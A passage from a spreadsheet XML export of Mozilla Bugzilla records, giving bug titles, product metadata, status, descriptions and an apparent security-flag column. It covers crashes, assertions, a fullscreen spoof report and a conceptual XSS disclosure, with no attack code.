* General information about TSan, data races, etc.
Typically, races reported by TSan are not false positives, but it is possible that the race is benign. Even in this case though, we should try to come up with a fix unless this would cause unacceptable performance issues. Also note that seemingly benign races can possibly be harmful (also depending on the compiler and the architecture) [1][2].
If the bug cannot be fixed, then this bug should be used to either make a compile-time annotation for blacklisting or add an entry to the runtime blacklist.
[1] http://software.intel.com/en-us/blogs/2013/01/06/benign-data-races-what-could-possibly-go-wrong
[2] _How to miscompile programs with "benign" data races_: https://www.usenix.org/legacy/events/hotpar11/tech/final_files/Boehm.pdf</t>
        </is>
      </c>
      <c r="X5134" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5135">
      <c r="A5135" t="n">
        <v>1287651</v>
      </c>
      <c r="B5135" t="inlineStr">
        <is>
          <t>2016-07-18 18:32:33 -0700</t>
        </is>
      </c>
      <c r="C5135" t="inlineStr">
        <is>
          <t>Correctly override InputConnection.getHandler() in GeckoInputConnection when we switch to SDK 24 (Android N)</t>
        </is>
      </c>
      <c r="D5135" t="inlineStr">
        <is>
          <t>2019-07-18 15:08:37 -0700</t>
        </is>
      </c>
      <c r="E5135" t="n">
        <v>1</v>
      </c>
      <c r="F5135" t="n">
        <v>1</v>
      </c>
      <c r="G5135" t="n">
        <v>7</v>
      </c>
      <c r="H5135" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5135" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J5135" t="inlineStr">
        <is>
          <t>Android Studio and Gradle Integration</t>
        </is>
      </c>
      <c r="K5135" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5135" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5135" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5135" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5135" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5135" t="inlineStr"/>
      <c r="Q5135" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5135" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5135" t="inlineStr">
        <is>
          <t>mozilla62</t>
        </is>
      </c>
      <c r="T5135" t="n">
        <v>1</v>
      </c>
      <c r="U5135" t="n">
        <v>0</v>
      </c>
      <c r="V5135" t="n">
        <v>7</v>
      </c>
      <c r="W5135" t="inlineStr">
        <is>
          <t>GeckoInputConnection extends InputConnection.
In the 24 SDK this adds a getHandler() method, which didn't exist in 23. We also implement our own getHandler().
We build against 23. If 24 is present on your system at build time, Lint will complain about the lack of the @Override annotation (it doesn't care that we're actually building against 23). Therefore an annotation-suppression was added in Bug 1284544.
Once we update to SDK24 we need to revisit this and add the correct annotations / check that we're still exhibiting expected behaviour.</t>
        </is>
      </c>
      <c r="X5135" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5136">
      <c r="A5136" t="n">
        <v>1490741</v>
      </c>
      <c r="B5136" t="inlineStr">
        <is>
          <t>2018-09-12 09:49:15 -0700</t>
        </is>
      </c>
      <c r="C5136" t="inlineStr">
        <is>
          <t>Tasks that fail with IndexError should not be retried</t>
        </is>
      </c>
      <c r="D5136" t="inlineStr">
        <is>
          <t>2018-12-12 08:45:31 -0800</t>
        </is>
      </c>
      <c r="E5136" t="n">
        <v>1</v>
      </c>
      <c r="F5136" t="n">
        <v>1</v>
      </c>
      <c r="G5136" t="n">
        <v>7</v>
      </c>
      <c r="H5136" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5136" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J5136" t="inlineStr">
        <is>
          <t>Treeherder: Data Ingestion</t>
        </is>
      </c>
      <c r="K5136" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L5136" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5136" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5136" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5136" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5136" t="inlineStr"/>
      <c r="Q5136" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5136" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5136" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5136" t="n">
        <v>1</v>
      </c>
      <c r="U5136" t="n">
        <v>0</v>
      </c>
      <c r="V5136" t="n">
        <v>4</v>
      </c>
      <c r="W5136" t="inlineStr">
        <is>
          <t>For example:
https://rpm.newrelic.com/accounts/677903/applications/14179757/filterable_errors?tw%5Bend%5D=1536769979&amp;tw%5Bstart%5D=1536683579#/show/5eeac251-b6a9-11e8-b58d-0242ac110006_4014_8026/stack_trace?top_facet=transactionUiName&amp;primary_facet=error.class&amp;barchart=barchart
exceptions:IndexError: list index out of range
number_of_prior_retries	6
IndexError (and maybe others) needs adding to:
https://github.com/mozilla/treeherder/blob/b5a6736f9b26ac7c6441fb5da3a95831933e7dd7/treeherder/workers/task.py#L17-L26</t>
        </is>
      </c>
      <c r="X5136" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5137">
      <c r="A5137" t="n">
        <v>460803</v>
      </c>
      <c r="B5137" t="inlineStr">
        <is>
          <t>2008-10-20 11:30:45 -0700</t>
        </is>
      </c>
      <c r="C5137" t="inlineStr">
        <is>
          <t>[FIX]PresShell::InitialReflow "ASSERTION: Why are we being called?" with XUL iframe</t>
        </is>
      </c>
      <c r="D5137" t="inlineStr">
        <is>
          <t>2008-12-16 16:51:55 -0800</t>
        </is>
      </c>
      <c r="E5137" t="n">
        <v>1</v>
      </c>
      <c r="F5137" t="n">
        <v>1</v>
      </c>
      <c r="G5137" t="n">
        <v>3</v>
      </c>
      <c r="H5137" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5137" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5137" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K5137" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5137" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5137" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5137" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5137" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5137" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q5137" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5137" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5137" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5137" t="n">
        <v>1</v>
      </c>
      <c r="U5137" t="n">
        <v>0</v>
      </c>
      <c r="V5137" t="n">
        <v>13</v>
      </c>
      <c r="W5137" t="inlineStr">
        <is>
          <t>Created attachment 343940
testcase (has external dependencies)
About 50% of the time, loading the testcase triggers these six assertions:
1. ###!!! ASSERTION: Why are we being called?: '!mDidInitialReflow', file layout/base/nsPresShell.cpp, line 2373
2. ###!!! ASSERTION: initial containing block already created: 'nsnull == mInitialContainingBlock', file layout/base/nsCSSFrameConstructor.cpp, line 8760
3. ###!!! ASSERTION: Already have an undisplayed context entry for aContent: '!GetUndisplayedContent(aContent)', file layout/base/nsFrameManager.cpp, line 574
4. ###!!! ASSERTION: unexpected mInitialContainingBlock: 'processChildren ? !mInitialContainingBlock : mInitialContainingBlock == contentFrame', file layout/base/nsCSSFrameConstructor.cpp, line 4308
5. ###!!! ASSERTION: unexpected second call to SetInitialChildList: 'Not Reached', file layout/generic/nsContainerFrame.cpp, line 111
6. ###!!! ASSERTION: Why is the root in mDirtyRoots already?: 'mDirtyRoots.IndexOf(rootFrame) == -1', file layout/base/nsPresShell.cpp, line 2462
and then closing it triggers:
7. ###!!! ASSERTION: Some objects allocated with AllocateFrame were not freed: 'mFrameCount == 0', file layout/base/nsPresShell.cpp, line 676</t>
        </is>
      </c>
      <c r="X5137" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5138">
      <c r="A5138" t="n">
        <v>1832627</v>
      </c>
      <c r="B5138" t="inlineStr">
        <is>
          <t>2023-05-11 09:34:56 -0700</t>
        </is>
      </c>
      <c r="C5138" t="inlineStr">
        <is>
          <t>select option with hides fullscreen notification, leads to spoof</t>
        </is>
      </c>
      <c r="D5138" t="inlineStr">
        <is>
          <t>2024-09-16 00:16:45 -0700</t>
        </is>
      </c>
      <c r="E5138" t="n">
        <v>1</v>
      </c>
      <c r="F5138" t="n">
        <v>1</v>
      </c>
      <c r="G5138" t="n">
        <v>3</v>
      </c>
      <c r="H5138" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5138" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5138" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K5138" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5138" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5138" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5138" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5138" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5138" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main123+][adv-esr115.8+]</t>
        </is>
      </c>
      <c r="Q5138" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5138" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S5138" t="inlineStr">
        <is>
          <t>123 Branch</t>
        </is>
      </c>
      <c r="T5138" t="n">
        <v>1</v>
      </c>
      <c r="U5138" t="n">
        <v>0</v>
      </c>
      <c r="V5138" t="n">
        <v>29</v>
      </c>
      <c r="W5138" t="inlineStr">
        <is>
          <t>Created attachment 9333128
bandicam 2023-05-04 20-34-33-377.mp4
I found a vulnerability  where a select option can cover fullscreen notifications which can lead to spoofs.
steps to produce
1. open http://103.186.0.20/selectoption2.html or selectoption2.html
2. double click or 3 times click (not fast click) on select option , (when the select option clicked it covers the fullscreen notification)</t>
        </is>
      </c>
      <c r="X5138" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5139">
      <c r="A5139" t="n">
        <v>1157404</v>
      </c>
      <c r="B5139" t="inlineStr">
        <is>
          <t>2015-04-22 12:31:44 -0700</t>
        </is>
      </c>
      <c r="C5139" t="inlineStr">
        <is>
          <t>[e10s] Possible to end up with two visuallyselected="true" tabs at the same time</t>
        </is>
      </c>
      <c r="D5139" t="inlineStr">
        <is>
          <t>2017-04-06 05:46:53 -0700</t>
        </is>
      </c>
      <c r="E5139" t="n">
        <v>1</v>
      </c>
      <c r="F5139" t="n">
        <v>1</v>
      </c>
      <c r="G5139" t="n">
        <v>2</v>
      </c>
      <c r="H5139" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5139" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5139" t="inlineStr">
        <is>
          <t>Tabbed Browser</t>
        </is>
      </c>
      <c r="K5139" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5139" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5139" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5139" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5139" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5139" t="inlineStr"/>
      <c r="Q5139" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5139" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5139" t="inlineStr">
        <is>
          <t>Firefox 50</t>
        </is>
      </c>
      <c r="T5139" t="n">
        <v>1</v>
      </c>
      <c r="U5139" t="n">
        <v>0</v>
      </c>
      <c r="V5139" t="n">
        <v>29</v>
      </c>
      <c r="W5139" t="inlineStr">
        <is>
          <t>Unfortunately I can't reproduce this.
I was getting a profile using the Gecko profiler addon, which opens a tab with cleopatra in it and janks the parent process a bit while it's getting the profile. While it was doing the profile symbolication, I switched between tabs, and suddenly ended up in the cleopatra tab (which I think was the one I clicked on last) while the tab I had clicked just before was still visuallyselected. So both the real active tab (the cleopatra one) and the previous one looked selected in the tab bar.</t>
        </is>
      </c>
      <c r="X5139" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5140">
      <c r="A5140" t="n">
        <v>672789</v>
      </c>
      <c r="B5140" t="inlineStr">
        <is>
          <t>2011-07-20 07:10:44 -0700</t>
        </is>
      </c>
      <c r="C5140" t="inlineStr">
        <is>
          <t>this script reliably crashes Firefox 5 on Linux, Mac and Windows by streaming an ogg file through a proxy</t>
        </is>
      </c>
      <c r="D5140" t="inlineStr">
        <is>
          <t>2024-05-29 15:56:11 -0700</t>
        </is>
      </c>
      <c r="E5140" t="n">
        <v>1</v>
      </c>
      <c r="F5140" t="n">
        <v>1</v>
      </c>
      <c r="G5140" t="n">
        <v>3</v>
      </c>
      <c r="H5140" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5140" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5140" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K5140" t="inlineStr">
        <is>
          <t>5 Branch</t>
        </is>
      </c>
      <c r="L5140" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5140" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5140" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5140" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5140" t="inlineStr">
        <is>
          <t>[sg:critical?][qa!]</t>
        </is>
      </c>
      <c r="Q5140" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5140" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5140" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5140" t="n">
        <v>1</v>
      </c>
      <c r="U5140" t="n">
        <v>0</v>
      </c>
      <c r="V5140" t="n">
        <v>27</v>
      </c>
      <c r="W5140" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.124 Safari/534.30
Steps to reproduce:
Connect to a proxyserver &amp; stream a specific ogg file to an HTML5 player. Then I seek to a part that has not yet been loaded. 
Actual results:
On firefox 4 this works, on 5 and 6 I get a crossplatform crash (Windows, Linux, Mac), a segfault
Expected results:
No segfault.</t>
        </is>
      </c>
      <c r="X5140" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5141">
      <c r="A5141" t="n">
        <v>667907</v>
      </c>
      <c r="B5141" t="inlineStr">
        <is>
          <t>2011-06-28 08:02:14 -0700</t>
        </is>
      </c>
      <c r="C5141" t="inlineStr">
        <is>
          <t>Possible XSS via HTTP 0.9 errors and content-sniffing</t>
        </is>
      </c>
      <c r="D5141" t="inlineStr">
        <is>
          <t>2012-05-17 00:07:15 -0700</t>
        </is>
      </c>
      <c r="E5141" t="n">
        <v>1</v>
      </c>
      <c r="F5141" t="n">
        <v>1</v>
      </c>
      <c r="G5141" t="n">
        <v>3</v>
      </c>
      <c r="H5141" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5141" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5141" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K5141" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5141" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5141" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5141" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5141" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5141" t="inlineStr">
        <is>
          <t>[sg:moderate][qa-] cross-browser, embargo until Dec 28, 2011</t>
        </is>
      </c>
      <c r="Q5141" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5141" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5141" t="inlineStr">
        <is>
          <t>mozilla8</t>
        </is>
      </c>
      <c r="T5141" t="n">
        <v>1</v>
      </c>
      <c r="U5141" t="n">
        <v>0</v>
      </c>
      <c r="V5141" t="n">
        <v>26</v>
      </c>
      <c r="W5141" t="inlineStr">
        <is>
          <t>[This is from the MB-Secissues mailing list.]
Hi
We just fixed an issue in Opera 11.50, but as we noticed a few other browsers are vulnerable, we did not post any details.
http://www.opera.com/docs/changelogs/windows/1150/: "Fixed a moderately severe issue. Details will be disclosed at a later date."
The issue is an old one. Some non-HTTP protocols running on a server might respond to HTTP requests with an error message, and return (parts of) the incoming request. If web browsers content-sniff data returned withouth HTTP headers, an attacker might be able to send data to such a service, and have the server return an error which the browser interprets as HTML/JS. This opens up for XSS.
HTTP version 0.9 (which is still in use in some rare cases) does not send HTTP headers, so we still content sniff on ports 80 and 443. Our fix is to stop content sniffing on non-standard ports. We require either an explicit HTTP/1.* header (then we will content sniff), or a Content-type. There are of course other fixes too, like not running scripting, even if one does content sniff. Our test case tests our implementation, so it might be some other browsers are not vulnerable, even though I have listed them as failing on our TC.
We will withhold information for now, if nobody tells us otherwise, we will publish full details next time we clean up in our unpublished advisories, at least half a year from now. If anyone wants us to hold off longer, or would like more info, please let us know.
Failing on our test case:
Opera 11.11
Chrome 12.0
Safari 5.0.4
Firefox 4.0.1
Internet Explorer 8.0
Passing on our test case:
Opera 11.50
This has been tested well, and we have found no compatibility issues with this.
-- 
Sigbjørn Vik
Quality Assurance
Opera Software
_______________________________________________
MB-SecIssues mailing list
MB-SecIssues@list.opera.com
https://list.opera.com/mailman/listinfo/mb-secissues</t>
        </is>
      </c>
      <c r="X5141" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5142">
      <c r="A5142" t="n">
        <v>1590741</v>
      </c>
      <c r="B5142" t="inlineStr">
        <is>
          <t>2019-10-23 06:22:20 -0700</t>
        </is>
      </c>
      <c r="C5142" t="inlineStr">
        <is>
          <t>update to new oidc-testprovider</t>
        </is>
      </c>
      <c r="D5142" t="inlineStr">
        <is>
          <t>2019-10-23 07:34:05 -0700</t>
        </is>
      </c>
      <c r="E5142" t="n">
        <v>1</v>
      </c>
      <c r="F5142" t="n">
        <v>1</v>
      </c>
      <c r="G5142" t="n">
        <v>4</v>
      </c>
      <c r="H5142" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5142" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J5142" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5142" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5142" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5142" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5142" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5142" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5142" t="inlineStr"/>
      <c r="Q5142" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5142" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5142" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5142" t="n">
        <v>1</v>
      </c>
      <c r="U5142" t="n">
        <v>0</v>
      </c>
      <c r="V5142" t="n">
        <v>3</v>
      </c>
      <c r="W5142" t="inlineStr">
        <is>
          <t>In the local development environment, we use an oidc-testprovider image as an OIDC OP that runs locally that you can manipulate user accounts on without affecting other systems.
I wanted to be able to create new accounts in the oidc-testprovider container so that I could script things I was doing. So we extended the image with the ability to create users in the container.
Recently, I stepped up as a co-maintainer for the [docker-test-mozilla-django-oidc](https://github.com/mozilla/docker-test-mozilla-django-oidc) project, landed the createuser changes we made, moved the project around so it was maintainable, and pushed out new images.
This bug covers updating to the most recent images and removing the createuser bits from our codebase since we no longer need them.</t>
        </is>
      </c>
      <c r="X5142" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5143">
      <c r="A5143" t="n">
        <v>648022</v>
      </c>
      <c r="B5143" t="inlineStr">
        <is>
          <t>2011-04-06 10:18:28 -0700</t>
        </is>
      </c>
      <c r="C5143" t="inlineStr">
        <is>
          <t>Firefox 4.2a1pre Crash Report [@ js_XDRScript(JSXDRState*, JSScript**) ] [@ js_XDRAtom ] [@ js_XDRScriptAndSubscripts(JSXDRState*, JSScript**) ]</t>
        </is>
      </c>
      <c r="D5143" t="inlineStr">
        <is>
          <t>2015-10-07 18:44:40 -0700</t>
        </is>
      </c>
      <c r="E5143" t="n">
        <v>1</v>
      </c>
      <c r="F5143" t="n">
        <v>1</v>
      </c>
      <c r="G5143" t="n">
        <v>3</v>
      </c>
      <c r="H5143" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5143" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5143" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5143" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5143" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5143" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N5143" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5143" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5143" t="inlineStr">
        <is>
          <t>[sg:critical?] fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q5143" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5143" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5143" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5143" t="n">
        <v>1</v>
      </c>
      <c r="U5143" t="n">
        <v>0</v>
      </c>
      <c r="V5143" t="n">
        <v>87</v>
      </c>
      <c r="W5143" t="inlineStr">
        <is>
          <t>Seen while reviewing trunk top changers. http://tinyurl.com/3bb45hf to the reports.
https://crash-stats.mozilla.com/report/index/64affb79-7ce6-437d-8e7d-441812110405
Frame 	Module 	Signature [Expand] 	Source
0 	mozjs.dll 	js_XDRScript 	js/src/jsscript.cpp:439
1 	mozjs.dll 	JS_XDRScriptObject 	js/src/jsxdrapi.cpp:735
2 	xul.dll 	ReadScriptFromStream 	js/src/xpconnect/loader/mozJSComponentLoader.cpp:367
3 	xul.dll 	mozJSComponentLoader::ReadScript 	js/src/xpconnect/loader/mozJSComponentLoader.cpp:899
4 	xul.dll 	mozJSComponentLoader::GlobalForLocation 	js/src/xpconnect/loader/mozJSComponentLoader.cpp:1044
5 	xul.dll 	nsRefPtr&lt;nsPresContext&gt;::~nsRefPtr&lt;nsPresContext&gt; 	obj-firefox/dist/include/nsAutoPtr.h:969
6 	xul.dll 	mozJSComponentLoader::JarKey 	js/src/xpconnect/loader/mozJSComponentLoader.cpp:599
7 	kernel32.dll 	InterlockedExchangeAdd 	
https://crash-stats.mozilla.com/report/index/64affb79-7ce6-437d-8e7d-441812110405</t>
        </is>
      </c>
      <c r="X5143" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5144">
      <c r="A5144" t="n">
        <v>657158</v>
      </c>
      <c r="B5144" t="inlineStr">
        <is>
          <t>2011-05-14 12:21:09 -0700</t>
        </is>
      </c>
      <c r="C5144" t="inlineStr">
        <is>
          <t>[SECURITY] Request email headers for attachment containing newline are corrupt</t>
        </is>
      </c>
      <c r="D5144" t="inlineStr">
        <is>
          <t>2011-08-24 13:48:09 -0700</t>
        </is>
      </c>
      <c r="E5144" t="n">
        <v>1</v>
      </c>
      <c r="F5144" t="n">
        <v>1</v>
      </c>
      <c r="G5144" t="n">
        <v>4</v>
      </c>
      <c r="H5144" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5144" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5144" t="inlineStr">
        <is>
          <t>Email Notifications</t>
        </is>
      </c>
      <c r="K5144" t="inlineStr">
        <is>
          <t>2.17.1</t>
        </is>
      </c>
      <c r="L5144" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5144" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5144" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5144" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5144" t="inlineStr">
        <is>
          <t>[infrasec:input][ws:low]</t>
        </is>
      </c>
      <c r="Q5144" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5144" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5144" t="inlineStr">
        <is>
          <t>Bugzilla 3.4</t>
        </is>
      </c>
      <c r="T5144" t="n">
        <v>1</v>
      </c>
      <c r="U5144" t="n">
        <v>0</v>
      </c>
      <c r="V5144" t="n">
        <v>27</v>
      </c>
      <c r="W5144" t="inlineStr">
        <is>
          <t>I received a request for an attachment with the following description:
&gt;Read the ignored data
&gt;[Checked in: See comment 18]
This caused the notification email to be corrupted.
I don't remember seeing this corruption before so I think it's a regression.</t>
        </is>
      </c>
      <c r="X5144" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5145">
      <c r="A5145" t="n">
        <v>594837</v>
      </c>
      <c r="B5145" t="inlineStr">
        <is>
          <t>2010-09-09 10:33:11 -0700</t>
        </is>
      </c>
      <c r="C5145" t="inlineStr">
        <is>
          <t>Tracking bug for build and release of SeaMonkey 2.0.8</t>
        </is>
      </c>
      <c r="D5145" t="inlineStr">
        <is>
          <t>2010-10-15 20:51:30 -0700</t>
        </is>
      </c>
      <c r="E5145" t="n">
        <v>1</v>
      </c>
      <c r="F5145" t="n">
        <v>1</v>
      </c>
      <c r="G5145" t="n">
        <v>2</v>
      </c>
      <c r="H5145" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5145" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J5145" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="K5145" t="inlineStr">
        <is>
          <t>SeaMonkey 2.0 Branch</t>
        </is>
      </c>
      <c r="L5145" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5145" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5145" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5145" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5145" t="inlineStr"/>
      <c r="Q5145" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5145" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5145" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5145" t="n">
        <v>1</v>
      </c>
      <c r="U5145" t="n">
        <v>0</v>
      </c>
      <c r="V5145" t="n">
        <v>3</v>
      </c>
      <c r="W5145" t="inlineStr">
        <is>
          <t>Grrr....
Oilspill release needed for bug 594571 :(</t>
        </is>
      </c>
      <c r="X5145" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5146">
      <c r="A5146" t="n">
        <v>1319639</v>
      </c>
      <c r="B5146" t="inlineStr">
        <is>
          <t>2016-11-22 18:57:40 -0800</t>
        </is>
      </c>
      <c r="C5146" t="inlineStr">
        <is>
          <t>Firefox doesn't enter "needs reauthentication" state after 401 getting a certificate during a sync</t>
        </is>
      </c>
      <c r="D5146" t="inlineStr">
        <is>
          <t>2017-01-17 11:05:05 -0800</t>
        </is>
      </c>
      <c r="E5146" t="n">
        <v>1</v>
      </c>
      <c r="F5146" t="n">
        <v>1</v>
      </c>
      <c r="G5146" t="n">
        <v>2</v>
      </c>
      <c r="H5146" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5146" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5146" t="inlineStr">
        <is>
          <t>Sync</t>
        </is>
      </c>
      <c r="K5146" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5146" t="inlineStr">
        <is>
